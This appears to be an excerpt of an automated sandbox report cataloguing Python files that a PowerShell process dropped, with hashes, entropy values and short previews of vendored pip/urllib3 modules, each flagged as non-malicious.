                                                                                                                                                                                                                              Preview:""".Low-level helpers for the SecureTransport bindings...These are Python functions that are not directly related to the high-level APIs.but are necessary to get them to work. They include a whole bunch of low-level.CoreFoundation messing about and memory management. The concerns in this module.are almost entirely about trying to avoid memory leaks and providing.appropriate and useful assistance to the higher-level code..""".import base64.import ctypes.import itertools.import os.import re.import ssl.import struct.import tempfile..from .bindings import CFConst, CoreFoundation, Security..# This regular expression is used to grab PEM data out of a PEM bundle.._PEM_CERTS_RE = re.compile(. b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL.)...def _cf_data_from_bytes(bytestring):. """. Given a bytestring, create a CFData object from it. This CFData object must. be CFReleased by the caller.. """. return CoreFoundation.CFDataCreate(. CoreFound
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11036
                                                                                                                                                                                                                              Entropy (8bit):4.403395833775948
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:3vaft8wfh2ACE7U/O0TCGs06jLNf3W435NAbtJEGJab:/4t8wFn4TtnOh3d3Ou/b
                                                                                                                                                                                                                              MD5:0039628936CCB81CCF64CA087B7506DD
                                                                                                                                                                                                                              SHA1:7AD51EA2742A5DCB5570A366CA554B60E6F2093E
                                                                                                                                                                                                                              SHA-256:551EBC780544D77EE5C53823043C029DAE5488165338A6B4D408FFFB905A0B3E
                                                                                                                                                                                                                              SHA-512:EB1D3626395D7D7995B07A1B378EBA42106233267997AF42E5A8E64A7A11F26542AF4569AE39F4BA8A23DCB7077521DB98060A8648A274284305287D358F0695
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".This module provides a pool manager that uses Google App Engine's.`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_...Example usage::.. from pip._vendor.urllib3 import PoolManager. from pip._vendor.urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox.. if is_appengine_sandbox():. # AppEngineManager uses AppEngine's URLFetch API behind the scenes. http = AppEngineManager(). else:. # PoolManager uses a socket-level API behind the scenes. http = PoolManager().. r = http.request('GET', 'https://google.com/')..There are `limitations <https://cloud.google.com/appengine/docs/python/\.urlfetch/#Python_Quotas_and_limits>`_ to the URLFetch service and it may not be.the best choice for your application. There are three options for using.urllib3 on Google App Engine:..1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is. cost-effective in many circumstances as long as your usage is within
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4528
                                                                                                                                                                                                                              Entropy (8bit):4.596062511195215
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:s5c6hKkqyJzyMoN0roDZnstVnvohq0VKe2Fc:2IYJLodnsrnvohqc2Fc
                                                                                                                                                                                                                              MD5:0D2564338CCABD0E3126C771ED288BB0
                                                                                                                                                                                                                              SHA1:40648662DB6948A234E567D5F162AFA5CD75CDB9
                                                                                                                                                                                                                              SHA-256:3657E45BB58C756F338AAB9DA298C7A16DBDF688350535A2D0878889BAAE1709
                                                                                                                                                                                                                              SHA-512:592C23D9350CDF0BAA763C98067581FE4A6204A2E00E96D1560044A04065CBD97B040CF969B5620AA9B4C96E19B552B85D8D8F2CDFD0D647F0584B64E76EA0B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".NTLM authenticating pool, contributed by erikcederstran..Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10.""".from __future__ import absolute_import..import warnings.from logging import getLogger..from ntlm import ntlm..from .. import HTTPSConnectionPool.from ..packages.six.moves.http_client import HTTPSConnection..warnings.warn(. "The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed ". "in urllib3 v2.0 release, urllib3 is not able to support it properly due ". "to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. ". "If you are a user of this module please comment in the mentioned issue.",. DeprecationWarning,.)..log = getLogger(__name__)...class NTLMConnectionPool(HTTPSConnectionPool):. """. Implements an NTLM authentication version of an urllib3 connection pool. """.. scheme = "https".. def __init__(self, user, pw, authurl, *args, **kwargs):. """. authurl is a random URL on
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17081
                                                                                                                                                                                                                              Entropy (8bit):4.788716888051959
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:uNP6MI83mNk112FOkw+vZKZ78Nu11GWDUGI0iwZzGBrzPwW4Q2kFlrl33hDYmD98:uNCk+k6tw+vYh2uvGUiwdtWxlpt72
                                                                                                                                                                                                                              MD5:395256C643FC9A1CC6277ACDA6FDCA81
                                                                                                                                                                                                                              SHA1:F33C6754F3AFEAADB1F1E3A8C1CB4A0D1C4911AA
                                                                                                                                                                                                                              SHA-256:843261E0C87263FA7EA0A9457187106954110EFE86326046B96F728F1C9E7A33
                                                                                                                                                                                                                              SHA-512:631435D1861FA2F012CD3151EE48C03573EA300BC5105DBADC08A9432C808BBEAAD38BCA42330FB6AE275A69991B459E42C6D5A4DA8979603EE73D7B0F906857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".TLS with SNI_-support for Python 2. Follow these instructions if you would.like to verify TLS certificates in Python 2. Note, the default libraries do.*not* do certificate checking; you need to do additional work to validate.certificates yourself...This needs the following packages installed:..* `pyOpenSSL`_ (tested with 16.0.0).* `cryptography`_ (minimum 1.3.4, from pyopenssl).* `idna`_ (minimum 2.0, from cryptography)..However, pyopenssl depends on cryptography, which depends on idna, so while we.use all three directly here we end up having relatively few packages required...You can install them with the following command:.... code-block:: bash.. $ python -m pip install pyopenssl cryptography idna..To activate certificate checking, call.:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code.before you begin making HTTP requests. This can be done in a ``sitecustomize``.module, or at any other time before your application begins using ``urllib3``,.like this
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34448
                                                                                                                                                                                                                              Entropy (8bit):4.636222522598056
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cIIr2W7SSgjjHsC3tG3+Cfah4h4MS24vUg1IizY:cjJx8c84CMS2C2
                                                                                                                                                                                                                              MD5:273B0E5F3E546F507C40E054FB7CDB35
                                                                                                                                                                                                                              SHA1:03DF700C2B18E4CA078335AFADB646F1177C7DE8
                                                                                                                                                                                                                              SHA-256:CA165D9958D8E8F23A11E15BA7BA983A9EBEBE9D5192FD8D32E3866848FBA667
                                                                                                                                                                                                                              SHA-512:80C1153819FD6E5ACA8C278EBA68AA564ACE732D47BDE761D29F36D6FDD9E032109DA603D39607F08251056CD9B3B0F6BF49B9B4F0B5FA0AD2888610CF740C61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".SecureTranport support for urllib3 via ctypes...This makes platform-native TLS available to urllib3 users on macOS without the.use of a compiler. This is an important feature because the Python Package.Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL.that ships with macOS is not capable of doing TLSv1.2. The only way to resolve.this is to give macOS users an alternative solution to the problem, and that.solution is to use SecureTransport...We use ctypes here because this solution must not require a compiler. That's.because pip is not allowed to require a compiler either...This is not intended to be a seriously long-term solution to this problem..The hope is that PEP 543 will eventually solve this issue for us, at which.point we can retire this contrib module. But in the short term, we need to.solve the impending tire fire that is Python on Mac without this kind of.contrib module. So...here we are...To use this module, simply import and inject it::..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7097
                                                                                                                                                                                                                              Entropy (8bit):4.61518223166273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:XojUEqJPKBddnuOSw/f2SxrrP611szEVkgJss:XVEqA1uOJ/f2SBrC11+EyMV
                                                                                                                                                                                                                              MD5:1CC7D6AEBA0181CC04CA63F73E21ABF4
                                                                                                                                                                                                                              SHA1:3BDE3FD1DC48479B42833C8F7C68B9F57B120B46
                                                                                                                                                                                                                              SHA-256:6918BD7965E8F5911BF795D4C5E7F8676D421659E78DB122028F473AC7A832DE
                                                                                                                                                                                                                              SHA-512:F8894FAF584D45DF073FC4096582F0A2CFDDC3C92DBD0A9F900EA4F9FF07A7FAC1F6C92836C25CFDAA887BAB999FEE9CF833BAF7C9A52FA853F1BB2CA1D96EAE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.""".This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in. your ``proxy_url`` to ensure that DNS resolution is done from the remote. server instead of client-side when connecting to a domain name...SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5.supports IPv4, IPv6, and domain names...When connecting to a
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8217
                                                                                                                                                                                                                              Entropy (8bit):4.735058868407703
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:e/1Sdu/Ds/a6sHyXNuvJ7q5jheEgHZWyj5cVPqCNIHtw6dov+K3x8fOVmmeHOVmm:ww/KfRWWHlcEC+H5dohvmmeHOVmucGK8
                                                                                                                                                                                                                              MD5:8E282C0B6583235297A2B8F5D22E36D8
                                                                                                                                                                                                                              SHA1:AE0A47792B96E8F918C9CA79E9834F99283D9CF4
                                                                                                                                                                                                                              SHA-256:D0C9E7A372874CD7D745F63BEB7F0DB9F38F9146FA9973A6F8BAA3FB8C76C3C0
                                                                                                                                                                                                                              SHA-512:F033D4D1C3397807617700A66F49495BAD64B85C0C060931D9FD94537C31F388AF84E3193FFB1718CE9762D54140D2264E8DBC079E373916120FDCE550A622B0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..from .packages.six.moves.http_client import IncompleteRead as httplib_IncompleteRead..# Base Exceptions...class HTTPError(Exception):. """Base exception used by this module.""".. pass...class HTTPWarning(Warning):. """Base warning used by this module.""".. pass...class PoolError(HTTPError):. """Base exception for errors caused within a pool.""".. def __init__(self, pool, message):. self.pool = pool. HTTPError.__init__(self, "%s: %s" % (pool, message)).. def __reduce__(self):. # For pickling purposes.. return self.__class__, (None, None)...class RequestError(PoolError):. """Base exception for PoolErrors that have associated URLs.""".. def __init__(self, pool, url, message):. self.url = url. PoolError.__init__(self, pool, message).. def __reduce__(self):. # For pickling purposes.. return self.__class__, (None, self.url, None)...class SSLError(HTTPError):. """Ra
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8579
                                                                                                                                                                                                                              Entropy (8bit):4.579166742309585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nSikc2tLoIP2LRdjIZpN2m17t1KREMtcRG/T7mKBz:nSikJ5Pj+mOEg7mKBz
                                                                                                                                                                                                                              MD5:93A2DC0508CF5901177F051F86D71C48
                                                                                                                                                                                                                              SHA1:DFA65A499039A4D0FC62F81CE2B41A981C5E0B3E
                                                                                                                                                                                                                              SHA-256:92F2C30A0FC9987D652E3514118FC52D2F14858EE106F0CFB951136D8F2676B3
                                                                                                                                                                                                                              SHA-512:4BC02537AFD195D360E41DE7C712BE753F75AB79AC7D1FDDE53DEFFFCA15C9475CBC1D716408FFC05EDFDA38DAA8AEC1549AB73FB87B5156BDA278F31C061352
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import email.utils.import mimetypes.import re..from .packages import six...def guess_content_type(filename, default="application/octet-stream"):. """. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. """. if filename:. return mimetypes.guess_type(filename)[0] or default. return default...def format_header_param_rfc2231(name, value):. """. Helper function to format and quote a single header parameter using the. strategy defined in RFC 2231... Particularly useful for header parameters which might contain. non-ASCII values, like file names. This follows. `RFC 2388 Section 4.4 <https://tools.ietf.org/html/rfc2388#section-4.4>`_... :param name:. The name of the parameter, a string expected to be ASCII only.. :param value:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2440
                                                                                                                                                                                                                              Entropy (8bit):4.639709442772028
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:P5gfyQt55UqO+vYNqs72GZ4l6uhhCj29Bae/zNivW:ayi5FO+Hsxusuhhg2VYW
                                                                                                                                                                                                                              MD5:2EA9F2FE3C06A4A560BC1DB53881D209
                                                                                                                                                                                                                              SHA1:5D0F199CD76DC0C256C2F6C038DCA67E6B2C8374
                                                                                                                                                                                                                              SHA-256:E5BFEAAA04475652FBB8BB5D018073061F861E653901F255B7FD8DD174B73DE6
                                                                                                                                                                                                                              SHA-512:BA8BBF4AA0D859D1E74A730164D7345C4E8B393CE88C4646AEEE693A23DF933DB71BB4B0BD2A78F3D6A52AF7D04B79F2D7EABDEC34A83E362935DEEF9B06D857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import binascii.import codecs.import os.from io import BytesIO..from .fields import RequestField.from .packages import six.from .packages.six import b..writer = codecs.lookup("utf-8")[3]...def choose_boundary():. """. Our embarrassingly-simple replacement for mimetools.choose_boundary.. """. boundary = binascii.hexlify(os.urandom(16)). if not six.PY2:. boundary = boundary.decode("ascii"). return boundary...def iter_field_objects(fields):. """. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... """. if isinstance(fields, dict):. i = six.iteritems(fields). else:. i = iter(fields).. for field in i:. if isinstance(field, RequestField):. yield field. else:. yield RequestField.from_tuples(*field)...def iter_fields(fields):. """. .. deprecated:: 1.6.. Iterate over fields... Th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.671406603620449
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxWOlllVO8l4EuWAuFK5VcK85kdVWrzLUhKBeHM+hLQRwIaQHtgem/l:gl/VneE+uw52KNdAreaeHxQ6Iaatgemt
                                                                                                                                                                                                                              MD5:86732BC2E85E9DE00DC1E2910DFBADA6
                                                                                                                                                                                                                              SHA1:B63362654D8DCC1C7EE79B4B52D9875239BA64D2
                                                                                                                                                                                                                              SHA-256:6515B6F883B36506F21A1F335AF9EEC01F8A45131C8102C4CF41F0BB9BE0FC55
                                                                                                                                                                                                                              SHA-512:251AEE6782EA0842E7DB74EBD7B678973DAC465CAFE53076614B25841E054A081A3BD6295B7801FADDA08510628A54BA7581F290F9493D9ED33BCBDA6BA30A8E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........VC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/packages/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41303
                                                                                                                                                                                                                              Entropy (8bit):5.5479952360677345
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:juAEeICnxB6+kYylSVyJSwpZzYesP0/DI13glg3XFI3g1v+zljDR:juAE4nxBkYylLJSwp9RsP0LI13glmASy
                                                                                                                                                                                                                              MD5:17826ACADD8207BAFB57472B4CD2A836
                                                                                                                                                                                                                              SHA1:3E155AEC401F3126F6CDC7136C771587C2EC804D
                                                                                                                                                                                                                              SHA-256:B09E26C67C575EDC1C716B9098A8BF05120049B47B3CC90282D4F37D8484366C
                                                                                                                                                                                                                              SHA-512:1D1624EDCE270DAC49B3CAF862CE92010E5C41443C9744218663414444C8F55D09266BE55D5824A6D41F82596A0580261E8A348F58F592A1D5C6BEAF8A8A734D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfi.........................N.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j...................d.....d.k(..Z.e.j...................d.....d.k(..Z.e.j...................d.d...d.k\..Z.e.r.e.f.Z.e.f.Z.e.f.Z.e.Z.e.Z.e.j...................Z.n_e.f.Z.e.e.f.Z.e.e.j6..................f.Z.e.Z.e.Z.e.j:..................j=..................d.........r...e.d.........Z.n"..G.d...d.e.........Z ....e!..e ....................e.d.........Z.[ e.r.d.d.l#m$Z$..n.d.Z$d...Z%d...Z&..G.d...d.e.........Z'..G.d...d.e'........Z(..G.d...d.e.jR..........................Z*..G.d...d.e'........Z+..G.d...d.e.........Z,..e,e-........Z...G.d...d.e*........Z/g...e+d.d.d.d.............e+d d!d"d#d ............e+d$d!d!d%d$............e+d&d'd"d(d&............e+d)d'd*............e+d+d!d"d,d+............e+d-d.d.d/d-............e+d0d.d.d-d0............e+d1d2d3............e+d4d'd"d5d4............e+d6d'e.r.d7n.d8d9............e+d:d'd;............e+d<d=d>d?............e+d.d.d.............e+d@d@dA..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.715173815019828
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxWOlllVO8l4XOFK5VcK85kdVWrzLUhKBeHM+1egKPRwIaQHtgem/l:gl/Vneew52KNdAreaeHt3i6Iaatgem/l
                                                                                                                                                                                                                              MD5:6FADCEDFC8D1E7B5EC76EF7ACA54E3BE
                                                                                                                                                                                                                              SHA1:71D1BC6FF1AF36598B58D080DC287A832AD3D653
                                                                                                                                                                                                                              SHA-256:23BB183F6E3C80FE1B765209BE450171FEB042C02BFEF1B3A839F2404DA7ADA1
                                                                                                                                                                                                                              SHA-512:50D32B5F57369A3CB9FCC5DCF966E01BC1A0A5FE8C64F410A1F66EE6E779A36EC5BF138636B41C3BDDCAC8EAB3D73D5D5BB483208CE2DF57C5A394E91647BF27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........`C:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/packages/backports/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1809
                                                                                                                                                                                                                              Entropy (8bit):5.773176008413409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Wa+yEPmdBdrIsQgacE9dfKOk0UuW1Urz7PIkjQXY:PlEe9RQKE9dfKOk7DUPjlX
                                                                                                                                                                                                                              MD5:E3EEEC11080D7A7144C5CF41B2B3EAC0
                                                                                                                                                                                                                              SHA1:CA93E1B6A205FFF0C02DF4AE6BBDBB44453273A9
                                                                                                                                                                                                                              SHA-256:3550A66CDDBC6968803735B8612F887035EECF5AA0785B7862FD285EF53FC84C
                                                                                                                                                                                                                              SHA-512:DB165C4531F5F63CCCC70EC30F7304B57E54637C06C6F6184ED5120378076C75F30D1F0B93ED5B5BF51D7FAD0A451B7F13F878C8185614FFD9AA59F27E2FFDBF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................&.....d.Z.d.d.l.Z.d.d.l.m.Z.....d.d...Z.y.).z..backports.makefile.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``socket.makefile`` method for use with anything that.wants to create a "fake" socket object.......N)...SocketIOc...........................t.........|.........h.d...k...s.t.........d.|...d.............d.|.v.}.d.|.v.x.s...|...}.|.s.|.s.J...d.|.v.}.d.}.|.r.|.d.z...}.|.r.|.d.z...}.t.........|.|.........}.|.x.j...................d.z...c._.........|...d.}.|.d.k...r.t.........j...................}.|.d.k(..r.|.s.t.........d...........|.S.|.r.|.r.t.........j...................|.|.|.........}.n3|.r.t.........j...................|.|.........}.n.|.s.J...t.........j...................|.|.........}.|.r.|.S.t.........j...................|.|.|.|.........}.|.|._.........|.S.).z:. Backport of ``socket.makefile`` from Python 3.5.. >......b..r..wz.invalid mode z. (only r, w, b allowed)r....r....r................r....z!unbuffered streams must be binary).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7315
                                                                                                                                                                                                                              Entropy (8bit):5.156374866240662
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uEarD6v4Vp1ufl+6R05qCL3A2RdH987ltFWrcFdTW224qs:ArDjp1ufRR2c2RdH6L5w/s
                                                                                                                                                                                                                              MD5:FD734D9BB530AFBC452CB41BBCD9A4A6
                                                                                                                                                                                                                              SHA1:F91AFEABECEBBA983D62E20710C0E63A65E693A0
                                                                                                                                                                                                                              SHA-256:4087B4C86F1BC0F38B273A9461CE66604F696E347C676A060F4471E280B3378E
                                                                                                                                                                                                                              SHA-512:66F9B8D3641164A8A1CAE5CB42A181FF134837491EF0BEDB0F0B191F70D7EC83A6A466CC3984714AEAE348E866356D416A2DCF0C787706063AA0A62A21E811DA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................L.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.g.Z...G.d...d.e.........Z.y.).zd.backports.weakref_finalize.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``weakref.finalize`` method.......)...absolute_importN)...ref..weakref_finalizec...........................e.Z.d.Z.d.Z.d.Z.i.Z.d.Z...e.j...........................Z.d.Z.d.Z...G.d...d.e.........Z.d...Z.d.d...Z.d...Z.d...Z.e.d...........Z.e.d...........Z.e.j*..................d...........Z.d...Z.e.d...........Z.e.d...........Z.y.).r....a....Class for finalization of weakrefable objects. finalize(obj, func, *args, **kwargs) returns a callable finalizer. object which will be called when obj is garbage collected. The. first time the finalizer is called it evaluates func(*arg, **kwargs). and returns the result. After this the finalizer is dead, and. calling it just returns None.. When the program exits any remaining finalizers for which the. atexit attribute is true will be run in
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1417
                                                                                                                                                                                                                              Entropy (8bit):4.612780318160635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ldryECFkyumlAs0C7a5JXrwszMd2kTiJar6CbDmlVLQ2LZLQHLQS1uH:ryEAQC7aPwsSTEarf3mly2SckuH
                                                                                                                                                                                                                              MD5:D26B39C4287D4132D46935C8E0B2E169
                                                                                                                                                                                                                              SHA1:DF04CDFC410623DE6479AF9FCB007388CFB9AA9E
                                                                                                                                                                                                                              SHA-256:9DBCEDDE2D1A80F54FD3B8EAAA08E16988CC9AE022FD6E44D04CB0662BD53BC1
                                                                                                                                                                                                                              SHA-512:0B1EBBA9DA250FF2CD7A3E6BCFF311DD1625D3BC0569463B5B6F549DB88361B9523C09DC67BDEFFE048BAB1E6E5DFC096BD5C8372D3EDE0D58D21372920326B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.""".backports.makefile.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``socket.makefile`` method for use with anything that.wants to create a "fake" socket object..""".import io.from socket import SocketIO...def backport_makefile(. self, mode="r", buffering=None, encoding=None, errors=None, newline=None.):. """. Backport of ``socket.makefile`` from Python 3.5.. """. if not set(mode) <= {"r", "w", "b"}:. raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)). writing = "w" in mode. reading = "r" in mode or not writing. assert reading or writing. binary = "b" in mode. rawmode = "". if reading:. rawmode += "r". if writing:. rawmode += "w". raw = SocketIO(self, rawmode). self._makefile_refs += 1. if buffering is None:. buffering = -1. if buffering < 0:. buffering = io.DEFAULT_BUFFER_SIZE. if buffering == 0:. if not binary:. raise ValueError("unbuffered s
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5343
                                                                                                                                                                                                                              Entropy (8bit):4.276268232282777
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WEQO/vCrbHYG32Hf/HOLT3NTE75WS4iENMmgbcu7w6Rc:Wjb4G32Hne0rmzu7w6Rc
                                                                                                                                                                                                                              MD5:F982B7D070FD238BD5C4069FBE0C795B
                                                                                                                                                                                                                              SHA1:D2FFB6DE72F18EBE708D2B80F2C94E5D5E3BF489
                                                                                                                                                                                                                              SHA-256:B5109A97938084D491C9BD03847A7EDFC02D2250AC44FF01C45DCD5FEEABA880
                                                                                                                                                                                                                              SHA-512:A74E953918A971D70CB6DF3D3001725C19BAA99DEC85A9BDCDF98F3EAC70876EC2E833733F83927EF498FBD822AC1159094B72F97A36A558A6981F1FA1C437C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.""".backports.weakref_finalize.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``weakref.finalize`` method..""".from __future__ import absolute_import..import itertools.import sys.from weakref import ref..__all__ = ["weakref_finalize"]...class weakref_finalize(object):. """Class for finalization of weakrefable objects. finalize(obj, func, *args, **kwargs) returns a callable finalizer. object which will be called when obj is garbage collected. The. first time the finalizer is called it evaluates func(*arg, **kwargs). and returns the result. After this the finalizer is dead, and. calling it just returns None.. When the program exits any remaining finalizers for which the. atexit attribute is true will be run in reverse order of creation.. By default atexit is true.. """.. # Finalizer objects don't have any state of their own. They are. # just used as keys to lookup _Info objects in the registry. This. # ensures that they cannot
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34665
                                                                                                                                                                                                                              Entropy (8bit):4.766523566155905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ESexRmKbIy/SiYG8vll2rix9mxOB5BWVlY:teHmKbIy/Si78z15cK
                                                                                                                                                                                                                              MD5:6A3D2D8F7AA243D3576E2CEC5FCF0AE2
                                                                                                                                                                                                                              SHA1:CC785B461D93A38116B3357589301BA20E9C8452
                                                                                                                                                                                                                              SHA-256:6FD2CCD30057BFB13B4AB6C28C09B8C3037E86B1FE88DC6FD7C2E058D30C28FA
                                                                                                                                                                                                                              SHA-512:8FD443C973411E400AEDA941BAC1F121447DA7705BDB27003BF37DA280695B8E270EEBB4F3F80513773776C8E24CCD3B04293645DDDE7E3345312527E143C5B6
                                                                                                                                                                                                                              Malicious:false
